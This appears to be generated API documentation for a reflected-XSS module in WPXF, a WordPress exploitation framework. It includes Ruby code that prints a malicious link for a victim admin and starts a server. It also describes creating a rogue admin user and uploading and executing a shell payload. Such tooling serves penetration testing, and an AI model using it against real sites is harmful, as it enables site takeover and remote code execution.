Module: Wpxf::WordPress::ReflectedXss

Includes:

Xss

Included in:

StagedReflectedXss

Defined in:

lib/wpxf/wordpress/reflected_xss.rb

Overview

Provides reusable functionality for reflected XSS modules.

Instance Method Summary

• #initialize ⇒ Object

  Initialize a new instance of ReflectedXss.

• #run ⇒ Boolean

  Run the module.

Methods included from Xss

#on_http_request, #upload_shell, #wordpress_js_create_user, #xss_ascii_encoded_include_script, #xss_host, #xss_include_script, #xss_path, #xss_shell_success, #xss_url, #xss_url_and_ascii_encoded_include_script

Methods included from Plugin

#fetch_plugin_upload_nonce, #generate_wordpress_plugin_header, #upload_payload_as_plugin, #upload_payload_as_plugin_and_execute

Methods included from Net::HttpServer

#http_server_bind_address, #http_server_bind_port, #http_server_thread, #js_ajax_download, #js_ajax_post, #js_post, #on_http_request, #start_http_server, #stop_http_server

Instance Method Details

#initialize ⇒ Object

Initialize a new instance of Wpxf::WordPress::ReflectedXss.

# File 'lib/wpxf/wordpress/reflected_xss.rb', line 8

def initialize
  super
  @success = false
  _update_info_without_validation(
    desc: %(
      This module prepares a payload and link that can be sent
      to an admin user which when visited with a valid session
      will create a new admin user which will be used to upload
      and execute the selected payload in the context of the
      web server.
    )
  )
end

#run ⇒ Boolean

Run the module.

Returns:

• (Boolean) —

  true if successful.

# File 'lib/wpxf/wordpress/reflected_xss.rb', line 24

def run
  unless respond_to? 'url_with_xss'
    raise 'Required method "url_with_xss" has not been implemented'
  end

  return false unless super
  return true if aux_module?

  emit_info 'Provide the URL below to the victim to begin the payload upload'
  puts
  puts url_with_xss
  puts

  start_http_server
  @success
end